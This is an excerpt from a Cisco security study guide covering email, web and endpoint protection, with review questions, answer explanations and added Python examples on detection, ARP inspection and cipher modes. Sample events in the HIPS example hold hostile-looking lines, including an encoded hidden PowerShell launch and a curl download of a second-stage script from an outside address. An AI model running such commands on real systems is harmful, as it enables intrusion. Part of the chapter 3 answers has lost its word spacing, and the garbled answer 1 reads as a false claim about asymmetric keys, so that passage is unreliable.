ESA's DLP features use rules for identifying classes of sensitive information such as personally identifiable information (PII), payment card numbers, bank routing numbers, financial account information, government ID numbers, personal names, addresses and phone numbers, and health care records. Moreover, you can design your own classes that include data not in these categories. Encryption is also possible to protect any sensitive information that must be sent.

Advanced Malware Protection

Advanced Malware Protection (AMP) is the malware component in ESA that uses a combination of several technologies to protect you from email-based malware.

File Reputation  A fingerprint of every file that traverses the Cisco email security gateway is sent to AMP's cloud-based intelligence network for a reputation verdict. Based on these results, you can block malicious files identified as having a bad reputation.

File Retrospection  Sometimes files enter the network and are later identified as being a threat. This capability allows for the identification and removal of these files later. If malicious behavior is spotted later, AMP sends a retrospective alert so that you can contain and remediate the malware. This process is depicted in Figure 17.1.

FIGURE 17.1 File retrospection

File Sandboxing  This provides the ability to analyze files that traverse the gateway. In the safe sandboxed environment, AMP can obtain details about the threat level of the malware and communicate that information to the Cisco Talos intelligence network to update the AMP cloud data for all.

ESA Message Flow

ESA performs its job by acting as a message transfer agent (MTA) in the email system. Another name for this function is email relay. Figure 17.2 shows a normal inbound message flow.

FIGURE 17.2 ESA inbound

Figure 17.3 shows a normal outbound message flow.

FIGURE 17.3 ESA outbound

Putting the Pieces Together

The various components that ESA brings to bear in its role as an email security utility work together in an integrated fashion, as shown in Figure 17.4, which is how ESA operates against incoming email.

FIGURE 17.4 Incoming mail processing

Regarding email that is leaving the organization, the operations of these components are depicted in Figure 17.5.

FIGURE 17.5 Outgoing mail processing
Mitigating Web-Based Threats

Another threat that presents itself to most enterprises is aimed at their web services. While not every organization has the need for an e-commerce server, almost every organization has a website or some type of web presence. Even a defacing of a public website, while not costly from a monetary standpoint, hurts the reputation and image of an organization.

One of the common ways of addressing threats against web applications and the web server software upon which they operate is a web proxy. Proxy servers in general stand between internal users or internal applications and potentially malicious requests coming from the Internet. A web proxy is a proxy that handles web traffic specifically: a forward proxy sits between internal users and the websites they request (the role the Cisco WSA described later plays), and a reverse proxy sits between a web application and the requests coming to it from the Internet. This section discusses web proxies and the functions they perform.

Understanding Web Proxies

Proxy servers can be appliances, or they can be installed on a server operating system. These servers act like a proxy firewall in that they create the web connection on behalf of the systems behind them, but they can typically allow and disallow traffic on a more granular basis. For example, a proxy server may allow the sales group to go to certain websites while not allowing the data entry group access to those same sites. The functionality extends beyond HTTP to other traffic types, such as FTP.

Proxy servers can provide an additional beneficial function called web caching. When a proxy server is configured to provide web caching, it saves a copy of all web pages that have been delivered to internal computers in a web cache. If any user requests the same page later, the proxy server has a local copy and need not spend the time and effort to retrieve it from the Internet. This greatly improves web performance for frequently requested pages.

From a deployment perspective, web proxies can be implemented in two ways.

Local  A local proxy is one that is installed on the premises, and all of the processing occurs on the local web proxy.

Cloud-Based  A cloud-based web proxy is one that transmits the traffic to a cloud location, where all the operations that would occur on a local web proxy occur in the cloud. In some cases, this offers the advantage of additional intelligence services that can aggregate and analyze telemetry data from billions of web requests, malware samples, and emerging attack methods.

Cisco Web Security Appliance

The Cisco Web Security Appliance (WSA) is a web proxy that integrates with other network components to monitor and control outbound requests for web content. Traffic can be directed to the WSA explicitly on the end host (an explicit proxy setting) or transparently by using the Web Cache Communication Protocol (WCCP) on an inline device like the perimeter router. The features it provides are covered in this section and will be followed by a description of traffic flow when using a WSA.

Blacklisting

Blacklisting and whitelisting can be used to create and support the acceptable use policy (AUP) of the organization. Moreover, they help to prevent malware from malicious sites from entering the network.

URL Filtering

The WSA reputation filters operate much like the reputation filters used in ESA, with the difference being that they operate against web domains rather than email sources. By leveraging Cisco Security Intelligence Operations (SIO), Cisco IronPort reputation filters analyze more than 50 web and network parameters to evaluate a website's trustworthiness.

Malware Scanning

The WSA anti-malware system uses multiple scanning engines in a single appliance. It uses the Dynamic Vectoring and Streaming Engine and verdict engines from both Webroot and McAfee.

URL Categorization

The Cisco URL filters can also be managed using access policies based on 52 predefined categories and an unlimited number of custom categories of sites. These can be used along with time-based policies to add additional flexibility.

Web Application Filtering

WSA uses Application Visibility and Control (AVC) to allow for the control of the use of web applications. Granular policy control allows administrators to permit the use of applications such as Dropbox or Facebook while blocking users from activities such as uploading documents or clicking the Like button.

TLS/SSL Decryption

In Cisco AsyncOS 9.0.0-485, the operating system in WSA, you can enable and disable SSLv3 and various versions of TLS for several services. Disabling SSLv3 for all services is recommended for best security. You also can enable a protocol fallback option; keep in mind that allowing fallback to an older protocol version reopens the weaknesses that disabling it was meant to close, so enable it only for the specific legacy services that need it.
Mitigating Endpoint Threats

This section discusses the protection of endpoints. Many of the items discussed in this section can be managed manually or with third-party tools, but many of them can be managed automatically using the Identity Services Engine (ISE). Before we discuss the security measures in this section and their potential relationship with ISE, let's take a brief look at ISE.

Cisco Identity Services Engine (ISE)

Finally, if the organization is implementing a BYOD policy, it can streamline this with self-service onboarding and management. While many of these features are beyond the scope of this book, we are going to discuss how it can handle the settings in this section.

Antivirus/Anti-malware

The Cisco ISE posture service interrogates a device requesting access for information regarding the presence and proper configuration of antivirus and/or anti-malware software. It also checks for the presence of the latest available updates. Only when the machine is fully compliant is it allowed full access to the network.

Personal Firewall

While the Cisco ISE posture service verifies the presence and proper configuration of antivirus and/or anti-malware software, it doesn't stop there. It can also verify the function and settings of the personal firewall. It can compare these with a baseline for compliance in the same way it verifies the antivirus and/or anti-malware software.

Hardware/Software Encryption of Local Data

Finally, sensitive data located on endpoints should be secured with either hardware or software encryption. Cisco ISE can be used to implement a mobile device management solution that can require encryption of the storage in both easily stolen mobile devices and other devices that may contain sensitive information.

HIPS

While not a function that can be controlled through ISE or TrustSec, a host-based IPS (HIPS) monitors traffic on a single system. Its primary responsibility is to protect the system on which it is installed. A HIPS typically works closely with anti-malware products and host firewall products. They generally monitor the interaction of sites and applications with the operating system and stop any malicious activity or, in some cases, ask the user to approve changes that the application or site would like to make to the system.

These systems can use several methods of detecting intrusions. The two main methods are as follows:

Signature based: Analyzes traffic and compares it to known patterns, called signatures, that reside in the IDS database. This requires constant updating of the signature database, and it cannot recognize an attack for which no signature exists yet.

Anomaly based: Analyzes traffic and compares it to a baseline of normal traffic to determine whether the traffic is a threat. This means any traffic out of the ordinary will set off an alert, so the quality of the baseline determines the false-positive rate.
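The two detection methods fail in opposite ways, and the clearest way to see that is to run both over the same events. The following Python is an example added by the editor, not code from the study guide or from any HIPS product. The three signatures are illustrative patterns written for this example (not any vendor's rule set), and the host events, baseline counts and process names are constructed.

```python
"""Signature-based and anomaly-based detection run over constructed host event logs."""
import re
import statistics

# --- signature based: known-bad patterns; anything not in this table is invisible to it ---
SIGNATURES = {
    "encoded-powershell": re.compile(r"powershell(?:\.exe)?\b.*\s-e(?:nc|ncodedcommand)?\b", re.I),
    "ld-preload-write":   re.compile(r"\bwrite\b.*/etc/ld\.so\.preload"),
    "shadow-read":        re.compile(r"\bread\b.*/etc/shadow"),
}


def signature_alerts(events):
    """Return (signature_name, event) for every event matching a known pattern."""
    hits = []
    for ev in events:
        for name, pattern in SIGNATURES.items():
            if pattern.search(ev):
                hits.append((name, ev))
    return hits


# --- anomaly based: compare current behaviour with a learned baseline per process ---
def anomaly_alerts(baseline, observed, k=3.0):
    """Flag a process whose count exceeds mean + k*stdev of its baseline, or that has no baseline at all."""
    alerts = {}
    for proc, count in observed.items():
        history = baseline.get(proc)
        if not history:
            alerts[proc] = "never seen during baseline period"
            continue
        mean = statistics.mean(history)
        stdev = statistics.pstdev(history)
        threshold = mean + k * stdev
        if count > threshold:
            alerts[proc] = f"{count} connections vs threshold {threshold:.1f}"
    return alerts


# Constructed sample data (hypothetical host logs, not from any real system)
EVENTS = [
    "uid=1001 exec powershell.exe -nop -w hidden -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoA",
    "uid=0 write /etc/ld.so.preload",
    "uid=1001 read /home/alice/notes.txt",
    "uid=1001 exec curl http://198.51.100.20/stage2.sh",   # no signature matches this
]

BASELINE = {            # outbound connections per minute seen during a one-week learning period
    "sshd":  [2, 3, 2, 4, 3, 2, 3],
    "nginx": [100, 120, 110, 115, 105, 118, 112],
    "curl":  [0, 1, 0, 1, 0, 0, 1],
}
OBSERVED = {"sshd": 3, "nginx": 117, "curl": 40, "nc": 5}   # this minute's counts


def run():
    return {
        "signature": [name for name, _ in signature_alerts(EVENTS)],
        "anomaly": anomaly_alerts(BASELINE, OBSERVED),
    }


if __name__ == "__main__":
    print(run())
```

The signature engine catches the encoded PowerShell launch and the `ld.so.preload` write but says nothing about the `curl` download, because no pattern describes it; the anomaly engine catches `curl` (40 connections against a baseline of roughly one) and flags `nc` simply because it was never seen while the baseline was learned. That last alert is the double edge of anomaly detection: a new legitimate tool produces exactly the same alert, and a baseline learned while an attacker was already present teaches the engine that the attacker is normal.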
Summary

In this chapter, you learned the mitigation techniques available when using the Cisco Email Security Appliance. These included reputation and context-based filtering. You also were introduced to the Cisco Web Security Appliance, which can use blacklisting, URL filtering, and malware scanning to secure web traffic and web applications. Finally, the chapter discussed endpoint protection provided by the Cisco Identity Services Engine and Cisco TrustSec technology.

Exam Essentials

Identify the processes used by Cisco ESA to protect email. These processes include spam filtering, reputation-based filtering, context-based filtering, anti-malware filtering, data loss prevention, blacklisting, and email encryption.

Describe the actions of which the Cisco Web Security Appliance is capable. Some examples of these actions are blacklisting, URL filtering, malware scanning, URL categorization, web application filtering, and TLS/SSL decryption.

Differentiate endpoint threats. These threats include viruses and malware, data disclosure, peer-to-peer attacks, and unauthorized access.

Identify techniques employed by the Cisco Identity Services Engine. These include access management, 802.1X, health and patch assessment, and verification of settings in the personal firewall.
Review Questions

1. Which of the following relies on the identification of email servers that have become known for sending spam?
A. Context-based filtering
B. Reputation-based filtering
C. Data-based filtering
D. Domain-based filtering

2. Which of the following occurs when sensitive data is disclosed to unauthorized personnel either intentionally or inadvertently?
A. Data leakage
B. Data egress
C. Information corruption
D. Unintended release

3. Which of the following is installed at network egress points near the perimeter?
A. Client DLP
B. Network DLP
C. Endpoint DLP
D. Composite DLP

4. Which of the following triggers almost zero false-positive incidents?
A. Precise methods
B. Complete methods
C. Imprecise methods
D. Sparse methods

5. With which sender score does ESA accept an email?
A. Between –1 and +10
B. Between –3 and –1
C. Between –10 and –3
D. Between +10 and +20

6. Which of the following is the malware component in ESA?
A. AMP
B. MAP
C. CMP
D. EMP

7. Which capability of AMP sends a fingerprint of every file that traverses the Cisco email security gateway to AMP's cloud-based intelligence network?
A. File reputation
B. File retrospection
C. File sandboxing
D. File examination

8. Which of the following uses real-time analysis on a vast, diverse, and global data set to detect URLs that contain some form of malware?
A. SPAN
B. WBRS
C. WCCP
D. SIO

9. Which of the following is a web proxy that integrates with other network components to monitor and control outbound requests for web content?
A. ESA
B. AMP
C. WSA
D. ISE

10. Which component analyzes more than 50 web and network parameters to evaluate a website's trustworthiness?
A. Cisco IronPort
B. Dynamic Vectoring and Streaming Engine
C. Web Cache Communication Protocol
D. Message Transfer Agent (MTA)

11. With which sender score does ESA block the email?
A. Between –1 and +10
B. Between –3 and –1
C. Between –10 and –3
D. Between +10 and +20

12. Which capability of AMP provides the ability to analyze files that traverse the gateway?
A. File reputation
B. File retrospection
C. File sandboxing
D. File examination

13. Which of the following uses the Dynamic Vectoring and Streaming Engine?
A. ESA
B. AMP
C. WSA
D. ISE

14. Which of the following allows administrators to permit the use of applications such as Dropbox or Facebook?
A. ESA
B. AMP
C. WSA
D. AVC

15. Which of the following can provide AAA services so that you can deploy 802.1X security?
A. ESA
B. ISE
C. WSA
D. AVC

16. Which capability of AMP allows for the identification and removal of files after they have been accepted?
A. File reputation
B. File retrospection
C. File sandboxing
D. File examination

17. With which sender score does ESA accept the email but throttle additional emails?
A. Between –1 and +10
B. Between –3 and –1
C. Between –10 and –3
D. Between +10 and +20

18. Which of the following can include keywords, lexicons, and regular expressions?
A. Precise methods
B. Complete methods
C. Imprecise methods
D. Sparse methods

19. Which of the following is installed on end-user workstations?
A. Client DLP
B. Network DLP
C. Endpoint DLP
D. Composite DLP

20. Which of the following filters the message and attachments for sender identities, message content, embedded URLs, and email formatting?
A. Context-based filtering
B. Reputation-based filtering
C. Data-based filtering
D. Domain-based filtering
Appendix
Answers to Review Questions

Chapter 1: Understanding Security Fundamentals

1. D. Accountability, although important, is not part of the CIA triad. The CIA triad includes confidentiality, integrity, and availability.

2. A. The principle of least privilege requires that a user or process is given only the minimum access privilege needed to perform a particular task. Its main purpose is to ensure that users have access only to the resources they need and are authorized to perform only the tasks they need to perform.

3. B. A threat occurs when a vulnerability is identified or exploited. A threat would occur when an attacker identified the folder on the computer that has an inappropriate or absent access control list.

4. D. NIST SP 800-30 identifies the following steps in the risk management process:
1. Identify the assets and their value.
2. Identify threats.
3. Identify vulnerabilities.
4. Determine likelihood.
5. Identify impact.

5. B. Sensitivity is a measure of how freely the data can be handled. Some data requires special care and handling, especially when inappropriate handling could result in penalties, identity theft, financial loss, invasion of privacy, or unauthorized access by an individual or many individuals.

6. C. These are typical commercial classifications:
1. Confidential
2. Private
3. Sensitive
4. Public

7. C. The Traffic Light Protocol classifications are:

Color   Meaning
Red     Shared only within a meeting
Amber   Shared only with those in the organization with a need to know
Green   Shared only within a community
White   No restriction, but still subject to copyright rules

8. C. Security Content Automation Protocol (SCAP) is a standard used by the security automation community to enumerate software flaws and configuration issues. It standardized the nomenclature and formats used.

9. B. These metric groups are described as follows:
Base: Characteristics of a vulnerability that are constant over time and user environments
Temporal: Characteristics of a vulnerability that change over time but not among user environments
Environmental: Characteristics of a vulnerability that are relevant and unique to a particular user's environment

10. D. The SLE is the monetary impact of each threat occurrence. To determine the SLE, you must know the asset value (AV) and the exposure factor (EF). The EF is the percent value or functionality of an asset that will be lost when a threat event occurs. The calculation for obtaining the SLE is as follows:
SLE = AV × EF

11. B. Mitigation is the process of selecting a control that will reduce the risk to an acceptable level.

12. B. The enterprise campus includes the end devices and provides them with access to the outside world and to the intranet data center through the enterprise core.

13. B. A demilitarized zone (DMZ) is an area where you can place a public server for access by people you might not trust otherwise. By isolating a server in a DMZ, you can hide or remove access to other areas of your network.

14. A. Network security zones can also be created at layer 2. Virtual local area networks (VLANs) are logical subdivisions of a switch that segregate ports from one another as if they were in different LANs.

15. B. Integrity, the second part of the CIA triad, ensures that data is protected from unauthorized modification or data corruption. The goal of integrity is to preserve the consistency of data, including data stored in files, databases, systems, and networks.

16. B. A defense-in-depth strategy refers to the practice of using multiple layers of security between data and the resources on which it resides and possible attackers. The first layer of a good defense-in-depth strategy is appropriate access control strategies.

17. A. A risk is the probability that a threat agent will exploit a vulnerability and the impact if the threat is carried out. The risk in the vulnerability example would be fairly high if the data residing in the folder is confidential. However, if the folder contains only public data, then the risk would be low.

18. C. This classification system, created by the United Kingdom's National Infrastructure Security Coordination Centre (NISCC, now the Centre for the Protection of National Infrastructure) and since adopted by the ISO/IEC as part of the standard on information security management for intersector and interorganizational communications and by CERT, is the Traffic Light Protocol (TLP). This system uses traffic light colors to classify information assets.

19. B. Common Vulnerabilities and Exposures (CVE) is a compilation of common vulnerabilities found in operating systems and applications.

20. C. The exposure factor (EF) is the percent value or functionality of an asset that will be lost when a threat event occurs.
Chapter 2: Understanding Security Threats

1. C. Hacktivists include those who hack not for personal gain but to further a cause. An example is the Anonymous group, which hacks from time to time for various political reasons.

2. A. IP address spoofing is one of the techniques used by hackers to hide their trail or to masquerade as another computer. The hacker alters the IP address as it appears in the packet. This can sometimes allow the packet to get through an ACL that is based on IP addresses.

3. C. Port scanning is not a password attack. By determining the services that are running on a system, the attacker also discovers potential vulnerabilities of the service of which the attacker may attempt to take advantage. This is typically done with a port scan in which all "open" or "listening" ports are identified.

4. C. When this packet is sent, these responses are possible:
No response: The port is open on the target.
RST: The port is closed on the target.

5. A. With proper input validation, a buffer overflow attack will cause an access violation. Without proper input validation, the allocated space will be exceeded, and the data at the bottom of the memory stack will be overwritten. The key to preventing many buffer overflow attacks is input validation, in which any input is checked for format and length before it is used.

6. D. A man-in-the-middle attack is launched by a single malicious individual, while DDoS attacks come from multiple devices.

7. A. One of the ways a man-in-the-middle attack is accomplished is by poisoning the ARP caches of the victim hosts. The attacker accomplishes this poisoning by answering ARP requests for another computer's IP address with the attacker's own MAC address. Once the ARP caches have been successfully poisoned, both computers will have the attacker's MAC address listed as the MAC address that maps to the other computer's IP address. As a result, both are sending to the attacker, placing the attacker "in the middle."

8. B. Dynamic ARP inspection (DAI) is a security feature that intercepts all ARP requests and responses and compares each response's MAC address and IP address information against the MAC–IP bindings contained in a trusted binding table. This table is built by also monitoring all DHCP requests for IP addresses and maintaining the mapping of each resulting IP address to a MAC address (which is part of DHCP snooping). If an incorrect mapping is attempted, the switch rejects the packet.

9. C. The main purpose of DHCP snooping is to prevent a poisoning attack on the DHCP database. This is not a switch attack per se, but one of its features can support DAI. It creates a mapping of IP addresses to MAC addresses from a trusted DHCP server that can be used in the validation process of DAI.

10. D. A virus is any malware that attaches itself to another application to replicate or distribute itself.

11. B. Intellectual property is property that is considered to be a unique creation of the mind and includes books, music, logos, inventions, and slogans.

12. C. The best mitigation for credit data theft is to adopt all recommendations of the Payment Card Industry Data Security Standard (PCI DSS).

13. B. MAC addresses can also be spoofed and used to get through MAC address filters. These filters are typically applied to control access to wireless access points at layer 2.

14. A. A possible mitigation technique is to implement the Sender Policy Framework (SPF). SPF is an email validation system that works by using DNS to determine whether an email sent by someone has been sent by a host sanctioned by that domain's administrator. If it can't be validated, it is not delivered to the recipient's mailbox.

15. B. Nmap is one of the most popular port scanning tools used today. By performing scans with certain flags set in the scan packets, security analysts (and hackers) can make certain assumptions based on the responses received.

16. C. An XMAS scan sets the FIN, PSH, and URG flags. When this packet is sent, these responses are possible:
No response: The port is open (or a filter silently dropped the probe) on the target.
RST: The port is closed on the target.

17. A. The ping-of-death attack is one in which an oversized ICMP packet is sent to the target. The maximum allowable IP packet size is 65,535 bytes, including the IP header, which is typically 20 bytes. An ICMP echo request carries an 8-byte ICMP header. Therefore, the maximum allowable size of the data area of an ICMP echo request is 65,507 bytes (65,535 – 20 – 8 = 65,507).

18. B. In a reflected DDoS attack, the attack is bounced off a large number of devices without actually recruiting the devices as zombies. A good example of this type of DDoS is the smurf attack.

19. C. The dynamic ARP inspection security feature intercepts all ARP requests and responses and compares each response's MAC address and IP address information against the MAC–IP bindings contained in a trusted binding table. This prevents ARP poisoning attacks.

20. B. Pharming is similar to phishing, but pharming actually pollutes the contents of a computer's DNS cache so that requests to a legitimate site are actually routed to an alternate site.
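For the DAI and DHCP snooping answers above (8, 9 and 19), the following Python is an example added by the editor; it is not from the study guide and it is not Cisco's implementation. It models the check a switch performs on each ARP packet arriving on an untrusted port: the sender's IP and MAC must match the DHCP snooping binding for that VLAN, the binding must belong to the ingress port, and (as an optional extra check) the Ethernet source MAC must match the ARP sender MAC. The binding table, port names and packets are constructed for this example.

```python
"""Dynamic ARP inspection: validate ARP packets against a DHCP snooping binding table."""
from dataclasses import dataclass


@dataclass(frozen=True)
class Binding:          # one entry of the DHCP snooping binding table
    vlan: int
    ip: str
    mac: str
    port: str


@dataclass(frozen=True)
class ArpPacket:
    vlan: int
    in_port: str
    eth_src: str        # source MAC in the Ethernet header
    sender_mac: str     # sender hardware address inside the ARP body
    sender_ip: str
    target_ip: str


class DynamicArpInspection:
    def __init__(self, bindings, trusted_ports, validate_src_mac=True):
        self.table = {(b.vlan, b.ip): b for b in bindings}
        self.trusted = set(trusted_ports)
        self.validate_src_mac = validate_src_mac

    def inspect(self, pkt: ArpPacket) -> str:
        if pkt.in_port in self.trusted:
            return "PERMIT trusted port"          # uplinks and the DHCP server port are not checked
        if self.validate_src_mac and pkt.eth_src.lower() != pkt.sender_mac.lower():
            return "DROP ethernet source MAC differs from ARP sender MAC"
        b = self.table.get((pkt.vlan, pkt.sender_ip))
        if b is None:
            return "DROP no binding for sender IP"
        if b.mac.lower() != pkt.sender_mac.lower():
            return "DROP sender MAC does not match binding"
        if b.port != pkt.in_port:
            return "DROP binding belongs to another port"
        return "PERMIT"


def demo():
    """Constructed scenario: two DHCP clients, an attacker on Gi1/0/7 claiming the gateway's IP."""
    bindings = [
        Binding(10, "10.0.10.11", "00:11:22:33:44:11", "Gi1/0/1"),
        Binding(10, "10.0.10.12", "00:11:22:33:44:12", "Gi1/0/2"),
    ]
    dai = DynamicArpInspection(bindings, trusted_ports={"Gi1/0/24"})
    gateway_ip, attacker_mac = "10.0.10.1", "de:ad:be:ef:00:07"
    packets = {
        "legit reply":     ArpPacket(10, "Gi1/0/1", "00:11:22:33:44:11", "00:11:22:33:44:11", "10.0.10.11", "10.0.10.1"),
        "gateway spoof":   ArpPacket(10, "Gi1/0/7", attacker_mac, attacker_mac, gateway_ip, "10.0.10.11"),
        "host spoof":      ArpPacket(10, "Gi1/0/7", attacker_mac, attacker_mac, "10.0.10.12", "10.0.10.11"),
        "header mismatch": ArpPacket(10, "Gi1/0/2", attacker_mac, "00:11:22:33:44:12", "10.0.10.12", "10.0.10.11"),
        "moved port":      ArpPacket(10, "Gi1/0/5", "00:11:22:33:44:12", "00:11:22:33:44:12", "10.0.10.12", "10.0.10.11"),
        "from uplink":     ArpPacket(10, "Gi1/0/24", "00:aa:bb:cc:dd:01", "00:aa:bb:cc:dd:01", gateway_ip, "10.0.10.11"),
    }
    return {name: dai.inspect(p) for name, p in packets.items()}


if __name__ == "__main__":
    for name, verdict in demo().items():
        print(f"{name:16s} {verdict}")
```

Two operational points follow from the model. First, the real gateway has no DHCP binding either, so its ARP replies must arrive on a trusted port (or be covered by a static ARP ACL), or DAI will drop them just as it drops the spoof. Second, the "moved port" drop shows why a laptop that moves to another port without renewing its lease loses connectivity until the binding is refreshed; that is expected behaviour, not a bug.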
Chapter3:UnderstandingCryptography1. A.Asymmetrickeyalgorithmdoesnotuseapublickey.Itusesamatchingorprivatekey
forbothencryptionanddecryption.
2. B.Asymmetricalgorithmsarenottypicallyusedfordataatrestbecausetheyareveryslowinrelationtosymmetricalgorithmsatthistask.Asymmetricalgorithmsareusedfordataintransit.
3. D.Blockciphersemploybothsubstitutionandtransposition.
4. B.Stream-basedciphersperformencryptiononabit-by-bitbasisandusekeystreamgenerators.ThekeystreamgeneratorscreateabitstreamthatisXORedwiththeplaintextbits.TheresultofthisXORoperationistheciphertext.
5. A.Somemodesofsymmetrickeyalgorithmsuseinitializationvectors(IVs)toensurethatpatternsarenotproducedduringencryption.TheseIVsprovidethisservicebyusingrandomvalueswiththealgorithms.
6. B. Although Electronic Codebook (ECB) is the easiest and fastest mode to use, it has security issues because every block is encrypted independently with the same key, so identical plaintext blocks produce identical ciphertext blocks. An observer can see repeated patterns in the ciphertext without knowing the key, and can cut, reorder, or replay individual blocks.
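To make the ECB weakness concrete, an added example (not from the study guide): a toy 64-bit Feistel block cipher used first in ECB and then in CBC with an IV, with a counter of duplicate ciphertext blocks standing in for what an observer sees. The toy cipher is assumed here only so the mode behaviour can be shown without a third-party AES library; it is not a secure cipher.

```python
"""ECB versus CBC: why identical plaintext blocks leak through ECB.

Added example; not code from the study guide. The 64-bit block cipher below is
a four-round Feistel network with an HMAC-SHA256 round function, a toy assumed
here only so the modes can be shown without a third-party AES library. It is
not a secure cipher; it stands in for DES/AES purely to show mode behaviour.
"""
import hashlib
import hmac

BLOCK = 8   # 64-bit blocks, as in DES
ROUNDS = 4


def _xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def _round(key: bytes, i: int, half: bytes) -> bytes:
    """Keyed, round-numbered PRF of one 32-bit half."""
    return hmac.new(key, bytes([i]) + half, hashlib.sha256).digest()[:4]


def block_encrypt(key: bytes, block: bytes) -> bytes:
    left, right = block[:4], block[4:]
    for i in range(ROUNDS):
        left, right = right, _xor(left, _round(key, i, right))
    return left + right


def block_decrypt(key: bytes, block: bytes) -> bytes:
    """Feistel inverse: run the rounds backwards, swapping the halves."""
    left, right = block[:4], block[4:]
    for i in reversed(range(ROUNDS)):
        left, right = _xor(right, _round(key, i, left)), left
    return left + right


def _blocks(data: bytes):
    if len(data) % BLOCK:
        raise ValueError("input must be padded to a multiple of the block size")
    return [data[i:i + BLOCK] for i in range(0, len(data), BLOCK)]


def ecb_encrypt(key: bytes, plaintext: bytes) -> bytes:
    """Each block encrypted independently: same plaintext block -> same ciphertext block."""
    return b"".join(block_encrypt(key, b) for b in _blocks(plaintext))


def ecb_decrypt(key: bytes, ciphertext: bytes) -> bytes:
    return b"".join(block_decrypt(key, c) for c in _blocks(ciphertext))


def cbc_encrypt(key: bytes, iv: bytes, plaintext: bytes) -> bytes:
    """Each block XORed with the previous ciphertext block (the IV for the first)."""
    out, prev = [], iv
    for b in _blocks(plaintext):
        prev = block_encrypt(key, _xor(b, prev))
        out.append(prev)
    return b"".join(out)


def cbc_decrypt(key: bytes, iv: bytes, ciphertext: bytes) -> bytes:
    out, prev = [], iv
    for c in _blocks(ciphertext):
        out.append(_xor(block_decrypt(key, c), prev))
        prev = c
    return b"".join(out)


def repeated_blocks(data: bytes) -> int:
    """How many blocks duplicate an earlier block: the pattern an observer sees."""
    blocks = _blocks(data)
    return len(blocks) - len(set(blocks))
```

With a plaintext containing repeated 8-byte blocks, the ECB output repeats in exactly the same positions while the CBC output does not, and changing the IV changes the whole CBC ciphertext.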
7. B. AES is the replacement algorithm for 3DES and DES. Although AES is considered the standard, the algorithm that is used in the AES standard is the Rijndael algorithm. The AES and Rijndael terms are often used interchangeably (strictly, AES is Rijndael restricted to a 128-bit block size with 128-, 192-, or 256-bit keys).
8. A. RSA is the most popular asymmetric algorithm and was invented by Ron Rivest, Adi Shamir, and Leonard Adleman. RSA can provide key exchange, encryption, and digital signatures. The strength of the RSA algorithm is the difficulty of finding the prime factors of very large numbers.
9. C. A collision occurs when a hash function produces the same hash value for two different messages.
10. D. The U.S. government requires the use of SHA-2 instead of MD5.
11. B. A hash MAC (HMAC) is a keyed-hash MAC that involves a hash function and a symmetric key. Because only a party holding the key can produce a valid tag, HMAC provides message authentication and integrity, which a plain hash cannot: an attacker who modifies a message can recompute its hash, but not its HMAC.
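An added example (not from the study guide) of the difference just described between a plain hash and an HMAC: the attacker can rewrite a message and recompute its SHA-256, but cannot produce a valid HMAC tag without the key. Key and message values are constructed.

```python
"""Plain hash versus HMAC for message integrity.

Added example; not code from the study guide. The key, the message and the
attacker's edit are constructed values.
"""
import hashlib
import hmac


def plain_digest(message: bytes) -> bytes:
    return hashlib.sha256(message).digest()


def verify_plain_digest(message: bytes, digest: bytes) -> bool:
    return hmac.compare_digest(plain_digest(message), digest)


def mac(key: bytes, message: bytes) -> bytes:
    return hmac.new(key, message, hashlib.sha256).digest()


def verify_mac(key: bytes, message: bytes, tag: bytes) -> bool:
    # constant-time compare: a byte-by-byte == would leak how much of the tag matched
    return hmac.compare_digest(mac(key, message), tag)


def tamper(message: bytes, attacker_key=None):
    """An attacker in the path rewrites the amount and recomputes the check value
    as best they can: a plain hash needs no secret, an HMAC needs the real key
    (attacker_key is whatever they guess)."""
    forged = message.replace(b"100", b"900")
    if attacker_key is None:
        return forged, plain_digest(forged)
    return forged, mac(attacker_key, forged)
```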
12. C. A digital signature is a hash value of the message encrypted (signed) with the sender's private key. A digital signature provides authentication, nonrepudiation, and integrity.
13. A. To use symmetric key algorithms for encrypting data, the two parties must share an identical symmetric key. This means we need some secure way to get identical symmetric keys onto the two endpoints. This is done by using an asymmetric algorithm for the key exchange and, once the keys are generated and exchanged, using the symmetric keys and a symmetric key algorithm for the encryption of the data. This is often called a hybrid cryptosystem.
14. A. Users and devices are issued public/private key pairs that are bound to a digital document called a digital certificate. This certificate (more specifically the keys to which it is bound) can be used for a variety of things including:
Encrypting data
As a form of authentication
Encrypting email
Digitally signing software
15. B. An X.509 certificate complies with the X.509 standard.
16. B. A CRL is a list of digital certificates that a CA has revoked. To find out whether a digital certificate has been revoked, the client must either download and check the CA's CRL or query the CA's OCSP responder for that certificate's status.
17. A. VeriSign first introduced the following digital certificate classes:
Class 1: For individuals, intended for e-mail. These certificates get saved by web browsers.
Class 2: For organizations that must provide proof of identity.
Class 3: For servers and software signing, in which independent verification and identity and authority checking is done by the issuing CA.
Class 4: For online business transactions between companies.
Class 5: For private organizations or governmental security.
18. B. Any participant that requests a certificate must first go through the registration authority (RA), which verifies the requestor's identity and registers the requestor. After the identity is verified, the RA passes the request to the CA. In many cases, the CA and the RA are the same server.
19. B. In some cases, two organizations may have a need to trust one another's certificates. This can be done by configuring cross certification. In cross certification, a trust is created between the two root CAs, which enables each system to trust certificates issued by the other.
20. B. The ASA has a self-signed default certificate that can be used, although in most cases it will be desirable to install a certificate from your PKI.
Chapter 4: Securing the Routing Process
1. D. While configuring a loopback IP address to be used for management access is certainly advisable, it is not required when configuring a router for SSH access.
2. C. The syslog message indicates that SSH version 1.99 has been enabled. This indicates that it is a version 2 server that can also accept connections from SSH version 1 clients (once every client supports version 2, restrict the server with ip ssh version 2).
3. D. The line in the configuration that says login local specifies that the user accounts will be local to this router.
4. A. Privilege levels allow you to assign a technician sets of activities that coincide with the level the technician has been assigned. There are 16 levels, from 0 to 15. User EXEC mode (router>) runs at privilege level 1 by default; level 0 permits only a handful of commands (disable, enable, exit, help, and logout). Privileged EXEC mode (router#) is level 15.
5. C. If the intent is to allow this technician to change IP addresses on interfaces, assign him that command. Since the ip command (along with the parameter address) is executed after entering interface configuration mode, you have to reference interface in the command, as shown here:
router(config)# privilege interface level 12 ip
6. B. The only view that exists by default is called root, which as you would expect allows access to all commands. Access to this view is provided when you submit the enable secret password.
7. B. To enable the protection of the boot image, issue the following command:
R64(config)# secure boot-image
*April 2 14:24:50.231: %IOS_RESILIENCE-5-IMAGE_RESIL_ACTIVE: Successfully secured running image
Notice the system message indicating the boot image is protected.
